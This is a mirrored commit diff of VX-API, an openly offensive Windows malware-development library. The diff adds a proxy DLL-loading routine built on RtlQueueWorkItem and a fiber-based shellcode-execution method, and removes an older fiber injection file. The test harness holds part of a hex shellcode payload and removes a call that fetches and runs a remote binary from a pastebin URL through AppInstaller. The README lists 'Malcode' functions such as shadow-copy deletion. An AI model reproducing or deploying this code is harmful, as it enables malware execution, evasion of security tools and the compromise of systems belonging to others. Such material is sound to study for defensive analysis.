mirror of https://github.com/vxunderground/VX-API
parent
1aed815bd8
commit
d6ff84b546
|
@ -3,7 +3,7 @@ managed by [vx-underground](https://vx-underground.org) | follow us on [Twitter]
|
|||
|
||||
# VX-API
|
||||
|
||||
Version: 2.0.402
|
||||
Version: 2.0.420
|
||||
|
||||
Developer: smelly__vx
|
||||
|
||||
|
@ -136,6 +136,7 @@ You're free to use this in any manner you please. You do not need to use this en
|
|||
| GetRtlUserProcessParameters | ReactOS | Library Loading |
|
||||
| GetTeb | ReactOS | Library Loading |
|
||||
| RtlLoadPeHeaders | smelly__vx | Library Loading |
|
||||
| ProxyWorkItemLoadLibrary | Rad98, Peter Winter-Smith | Library Loading |
|
||||
| MpfComModifyShortcutTarget | Unknown | Malcode |
|
||||
| MpfComVssDeleteShadowVolumeBackups | am0nsec | Malcode |
|
||||
| OleGetClipboardData | Microsoft | Malcode |
|
||||
|
|
|
@ -26,6 +26,9 @@ typedef NTSTATUS(NTAPI* RTLIPV4STRINGTOADDRESSW)(PCWSTR, BOOL, LPCWSTR*, PIN_ADD
|
|||
typedef NTSTATUS(NTAPI* RTLIPV4STRINGTOADDRESSA)(PCSTR, BOOL, LPCSTR*, PIN_ADDR);
|
||||
typedef PWSTR(NTAPI* RTLIPV4ADDRESSTOSTRINGW)(PIN_ADDR, PWSTR);
|
||||
typedef PSTR(NTAPI* RTLIPV4ADDRESSTOSTRINGA)(PIN_ADDR, PSTR);
|
||||
typedef INT(NTAPI* RTLUSERFIBERSTART)(VOID);
|
||||
typedef NTSTATUS(NTAPI* NTWAITFORSINGLEOBJECT)(HANDLE, BOOL, PLARGE_INTEGER);
|
||||
typedef NTSTATUS(NTAPI* RTLQUEUEWORKITEM)(PRTL_WORK_ITEM_ROUTINE, PVOID, ULONG);
|
||||
|
||||
|
||||
|
||||
|
|
|
@ -16,7 +16,21 @@ HMODULE GetModuleHandleEx2A(_In_ LPCSTR lpModuleName)
|
|||
{
|
||||
ZeroMemoryEx(wDllName, sizeof(wDllName));
|
||||
WCharStringToCharString(wDllName, Module->BaseDllName.Buffer, 64);
|
||||
if (StringCompareA(lpModuleName, wDllName) == 0)
|
||||
|
||||
CHAR InitialModuleName[256] = { 0 };
|
||||
CHAR IdentifiedModuleName[256] = { 0 };
|
||||
|
||||
if (StringCopyA(InitialModuleName, (PCHAR)lpModuleName) == NULL)
|
||||
return NULL;
|
||||
|
||||
if (StringCopyA(IdentifiedModuleName, wDllName) == NULL)
|
||||
return NULL;
|
||||
|
||||
PCHAR ComparisonObject1 = CaplockStringA(InitialModuleName);
|
||||
PCHAR ComparisonObject2 = CaplockStringA(IdentifiedModuleName);
|
||||
|
||||
|
||||
if (StringCompareA(ComparisonObject1, ComparisonObject2) == 0)
|
||||
return (HMODULE)Module->BaseAddress;
|
||||
}
|
||||
|
||||
|
@ -40,7 +54,19 @@ HMODULE GetModuleHandleEx2W(_In_ LPCWSTR lpModuleName)
|
|||
Module = (PLDR_MODULE)((PBYTE)Next - 16);
|
||||
if (Module->BaseDllName.Buffer != NULL)
|
||||
{
|
||||
if (StringCompareW(lpModuleName, Module->BaseDllName.Buffer) == 0)
|
||||
WCHAR InitialModuleName[256] = { 0 };
|
||||
WCHAR IdentifiedModuleName[256] = { 0 };
|
||||
|
||||
if (StringCopyW(InitialModuleName, (PWCHAR)lpModuleName) == NULL)
|
||||
return NULL;
|
||||
|
||||
if (StringCopyW(IdentifiedModuleName, Module->BaseDllName.Buffer) == NULL)
|
||||
return NULL;
|
||||
|
||||
PWCHAR ComparisonObject1 = CaplockStringW(InitialModuleName);
|
||||
PWCHAR ComparisonObject2 = CaplockStringW(IdentifiedModuleName);
|
||||
|
||||
if (StringCompareW(ComparisonObject1, ComparisonObject2) == 0)
|
||||
return (HMODULE)Module->BaseAddress;
|
||||
}
|
||||
|
||||
|
|
|
@ -1124,3 +1124,4 @@ typedef struct _FILE_PROCESS_IDS_USING_FILE_INFORMATION{
|
|||
|
||||
typedef VOID(NTAPI* PIO_APC_ROUTINE)(PVOID ApcContext, _In_ PIO_STATUS_BLOCK IoStatusBlock, _In_ ULONG Reserved);
|
||||
|
||||
typedef DWORD(CALLBACK* PRTL_WORK_ITEM_ROUTINE)(LPVOID);
|
||||
|
|
|
@ -30,20 +30,16 @@ int main(VOID)
|
|||
"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
|
||||
"\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00";
|
||||
|
||||
/*SHELLCODE_EXECUTION_INFORMATION Sei = { 0 };
|
||||
SHELLCODE_EXECUTION_INFORMATION Sei = { 0 };
|
||||
Sei.Payload = GlobalOpenCalcPayload;
|
||||
Sei.dwLengthOfPayloadInBytes = 277;
|
||||
Sei.MethodEnum = E_DNSQUERYEX;
|
||||
Sei.MethodEnum = E_RTLUSERFIBERSTART;
|
||||
|
||||
ShellcodeExecutionViaFunctionCallbackMain(&Sei);
|
||||
|
||||
*/
|
||||
|
||||
MpfLolExecuteRemoteBinaryByAppInstallerW((PWCHAR)L"https://pastebin.com/raw/tdyShwLw", 34);
|
||||
|
||||
|
||||
//ShellcodeExecutionViaFunctionCallbackMain(&Sei);
|
||||
|
||||
HMODULE hMod = ProxyWorkItemLoadLibraryA("DBGHELP.DLL");
|
||||
|
||||
|
||||
return dwError;
|
||||
}
|
||||
|
||||
|
|
|
@ -1,46 +0,0 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
typedef int(WINAPI* RtlUserFiberStart)();
|
||||
|
||||
DWORD __revision_required_ProcessInjectFiberData(_In_ PCHAR Shellcode, _In_ DWORD Length)
|
||||
{
|
||||
NTSTATUS status;
|
||||
DWORD OldProt = 0;
|
||||
|
||||
PTEB pTeb = GetTeb();
|
||||
PVOID pTebFlags = (PVOID)((UINT_PTR)pTeb + 0x17ee);
|
||||
*(PCHAR)pTebFlags = *(PCHAR)pTebFlags | 0x4;
|
||||
|
||||
|
||||
HMODULE hModule = GetModuleHandleA("ntdll.dll");
|
||||
RtlUserFiberStart pRtlUserFiberStart = (RtlUserFiberStart)GetProcAddress(hModule, "RtlUserFiberStart");
|
||||
|
||||
LPVOID BufferAddress = VirtualAlloc(NULL,
|
||||
Length,
|
||||
MEM_COMMIT | MEM_RESERVE,
|
||||
PAGE_READWRITE);
|
||||
|
||||
RtlCopyMemory(BufferAddress, Shellcode, Length);
|
||||
|
||||
status = VirtualProtect(BufferAddress,
|
||||
Length,
|
||||
PAGE_EXECUTE_READ,
|
||||
&OldProt);
|
||||
|
||||
if (status != 0)
|
||||
{
|
||||
UINT_PTR pFiberData = (UINT_PTR)HeapAlloc(GetProcessHeap(),
|
||||
HEAP_ZERO_MEMORY,
|
||||
0x100);
|
||||
|
||||
*(LPVOID*)(pFiberData + 0x0a8) = BufferAddress;
|
||||
|
||||
__writegsqword(0x20, pFiberData);
|
||||
pRtlUserFiberStart();
|
||||
|
||||
HeapFree(GetProcessHeap(), 0, (LPVOID)pFiberData);
|
||||
}
|
||||
|
||||
VirtualFree(BufferAddress, Length, MEM_RELEASE);
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,49 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
HMODULE ProxyWorkItemLoadLibraryW(_In_ LPCWSTR lpModuleName)
|
||||
{
|
||||
NTWAITFORSINGLEOBJECT NtWaitForSingleObject = NULL;
|
||||
RTLQUEUEWORKITEM RtlQueueWorkItem = NULL;
|
||||
NTSTATUS Status = STATUS_SUCCESS;
|
||||
LARGE_INTEGER Timeout = { 0 };
|
||||
|
||||
NtWaitForSingleObject = (NTWAITFORSINGLEOBJECT)GetProcAddressA((DWORD64)GetModuleHandleEx2W(L"ntdll.dll"), "NtWaitForSingleObject");
|
||||
RtlQueueWorkItem = (RTLQUEUEWORKITEM)GetProcAddressA((DWORD64)GetModuleHandleEx2W(L"ntdll.dll"), "RtlQueueWorkItem");
|
||||
|
||||
if (!NtWaitForSingleObject || !RtlQueueWorkItem)
|
||||
return NULL;
|
||||
|
||||
Status = RtlQueueWorkItem((PRTL_WORK_ITEM_ROUTINE)&LoadLibraryW, (PVOID)lpModuleName, WT_EXECUTEDEFAULT);
|
||||
if (!NT_SUCCESS(Status))
|
||||
return NULL;
|
||||
|
||||
Timeout.QuadPart = -500000;
|
||||
|
||||
NtWaitForSingleObject(InlineGetCurrentProcess, FALSE, &Timeout);
|
||||
|
||||
return GetModuleHandleEx2W(lpModuleName);
|
||||
}
|
||||
|
||||
HMODULE ProxyWorkItemLoadLibraryA(_In_ LPCSTR lpModuleName)
|
||||
{
|
||||
NTWAITFORSINGLEOBJECT NtWaitForSingleObject = NULL;
|
||||
RTLQUEUEWORKITEM RtlQueueWorkItem = NULL;
|
||||
NTSTATUS Status = STATUS_SUCCESS;
|
||||
LARGE_INTEGER Timeout = { 0 };
|
||||
|
||||
NtWaitForSingleObject = (NTWAITFORSINGLEOBJECT)GetProcAddressA((DWORD64)GetModuleHandleEx2W(L"ntdll.dll"), "NtWaitForSingleObject");
|
||||
RtlQueueWorkItem = (RTLQUEUEWORKITEM)GetProcAddressA((DWORD64)GetModuleHandleEx2W(L"ntdll.dll"), "RtlQueueWorkItem");
|
||||
|
||||
if (!NtWaitForSingleObject || !RtlQueueWorkItem)
|
||||
return NULL;
|
||||
|
||||
Status = RtlQueueWorkItem((PRTL_WORK_ITEM_ROUTINE)&LoadLibraryA, (PVOID)lpModuleName, WT_EXECUTEDEFAULT);
|
||||
if (!NT_SUCCESS(Status))
|
||||
return NULL;
|
||||
|
||||
Timeout.QuadPart = -500000;
|
||||
|
||||
NtWaitForSingleObject(InlineGetCurrentProcess, FALSE, &Timeout);
|
||||
|
||||
return GetModuleHandleEx2A(lpModuleName);
|
||||
}
|
|
@ -219,6 +219,30 @@ DWORD ShellcodeExecutionDispatchHandler(LPVOID Param)
|
|||
|
||||
}
|
||||
|
||||
case E_RTLUSERFIBERSTART:
|
||||
{
|
||||
RTLUSERFIBERSTART RtlUserFiberStart = NULL;
|
||||
DWORD64 FiberData = NULL;
|
||||
PTEB Teb = GetTeb();
|
||||
|
||||
RtlUserFiberStart = (RTLUSERFIBERSTART)GetProcAddressW((DWORD64)GetModuleHandleEx2W(L"ntdll.dll"), L"RtlUserFiberStart");
|
||||
if (RtlUserFiberStart == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Teb->SameTebFlags |= 0b100;
|
||||
|
||||
FiberData = (DWORD64)HeapAlloc(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, 0x100);
|
||||
if (FiberData == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
*(LPVOID*)(FiberData + 0x0a8) = BinAddress;
|
||||
|
||||
__writegsqword(0x20, FiberData);
|
||||
|
||||
RtlUserFiberStart();
|
||||
|
||||
}
|
||||
|
||||
default:
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
|
|
|
@ -161,6 +161,7 @@
|
|||
<ClCompile Include="GetByteArrayFromFile.cpp" />
|
||||
<ClCompile Include="GetCurrentDirectoryFromUserProcessParameters.cpp" />
|
||||
<ClCompile Include="GetCurrentLocaleFromTeb.cpp" />
|
||||
<ClCompile Include="GetCurrentProcessIdFromOffset.cpp" />
|
||||
<ClCompile Include="GetCurrentProcessIdFromTeb.cpp" />
|
||||
<ClCompile Include="GetCurrentUserSid.cpp" />
|
||||
<ClCompile Include="GetCurrentWindowTextFromUserProcessParameter.cpp" />
|
||||
|
@ -189,8 +190,10 @@
|
|||
<ClCompile Include="GetProcAddressFowlerNollVoVariant1a.cpp" />
|
||||
<ClCompile Include="GetProcAddressJenkinsOneAtATime32Bit.cpp" />
|
||||
<ClCompile Include="GetProcAddressLoseLose.cpp" />
|
||||
<ClCompile Include="GetProcAddressMurmur.cpp" />
|
||||
<ClCompile Include="GetProcAddressRotr32.cpp" />
|
||||
<ClCompile Include="GetProcAddressSdbm.cpp" />
|
||||
<ClCompile Include="GetProcAddressSipHash.cpp" />
|
||||
<ClCompile Include="GetProcAddressSuperFastHash.cpp" />
|
||||
<ClCompile Include="GetProcAddressUnknownGenericHash1.cpp" />
|
||||
<ClCompile Include="GetProcessBinaryNameFromHwnd.cpp" />
|
||||
|
@ -205,8 +208,10 @@
|
|||
<ClCompile Include="HashStringFowlerNollVoVariant1a.cpp" />
|
||||
<ClCompile Include="HashStringJenkinsOneAtATime32Bit.cpp" />
|
||||
<ClCompile Include="HashStringLoseLose.cpp" />
|
||||
<ClCompile Include="HashStringMurmur.cpp" />
|
||||
<ClCompile Include="HashStringRotr32.cpp" />
|
||||
<ClCompile Include="HashStringSdbm.cpp" />
|
||||
<ClCompile Include="HashStringSipHash.cpp" />
|
||||
<ClCompile Include="HashStringSuperFastHash.cpp" />
|
||||
<ClCompile Include="HashStringUnknownGenericHash1.cpp" />
|
||||
<ClCompile Include="IsDebuggerPresentEx.cpp" />
|
||||
|
@ -228,6 +233,7 @@
|
|||
<ClCompile Include="MpfGetLsaPidFromNamedPipe.cpp" />
|
||||
<ClCompile Include="MpfGetLsaPidFromRegistry.cpp" />
|
||||
<ClCompile Include="MpfGetLsaPidFromServiceManager.cpp" />
|
||||
<ClCompile Include="ProxyWorkItemLoadLibrary.cpp" />
|
||||
<ClCompile Include="__unstable__preview__MpfSilentInstallGoogleChromePlugin.cpp" />
|
||||
<ClCompile Include="SendIcmpEchoMessageToIPv4Host.cpp" />
|
||||
<ClCompile Include="OleGetClipboardData.cpp" />
|
||||
|
|
|
@ -459,6 +459,24 @@
|
|||
<ClCompile Include="FastcallExecuteBinaryShellExecuteEx.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="HashStringMurmur.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Cryptography Related\String Hashing</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="HashStringSipHash.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Cryptography Related\String Hashing</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="GetProcAddressSipHash.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Library Loading</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="GetProcAddressMurmur.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Library Loading</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="GetCurrentProcessIdFromOffset.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="ProxyWorkItemLoadLibrary.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Library Loading</Filter>
|
||||
</ClCompile>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="Internal.h">
|
||||
|
|
|
@ -88,7 +88,8 @@ typedef enum SHELLCODE_EXECUTION_METHOD {
|
|||
E_ENUMERATELOADEDMODULES, //30
|
||||
E_ENUMPAGEFILESW, //31
|
||||
E_ENUMPWRSCHEMES, //32
|
||||
E_DNSQUERYEX //33
|
||||
E_DNSQUERYEX, //33
|
||||
E_RTLUSERFIBERSTART //34 UNSTABLE, FAILS
|
||||
}SHELLCODE_EXECUTION_METHOD, *PSHELLCODE_EXECUTION_METHOD;
|
||||
|
||||
typedef struct __SHELLCODE_EXECUTION_INFORMATION {
|
||||
|
@ -165,6 +166,8 @@ DWORD64 __stdcall GetProcAddressW(_In_ DWORD64 ModuleBase, _In_ LPCWSTR lpProcNa
|
|||
BOOL RtlLoadPeHeaders(_Inout_ PIMAGE_DOS_HEADER* Dos, _Inout_ PIMAGE_NT_HEADERS* Nt, _Inout_ PIMAGE_FILE_HEADER* File, _Inout_ PIMAGE_OPTIONAL_HEADER* Optional, _Inout_ PBYTE* ImageBase);
|
||||
HMODULE GetModuleHandleEx2A(_In_ LPCSTR lpModuleName);
|
||||
HMODULE GetModuleHandleEx2W(_In_ LPCWSTR lpModuleName);
|
||||
HMODULE ProxyWorkItemLoadLibraryW(_In_ LPCWSTR lpModuleName);
|
||||
HMODULE ProxyWorkItemLoadLibraryA(_In_ LPCSTR lpModuleName);
|
||||
|
||||
|
||||
|
||||
|
|
Loading…
Reference in New Issue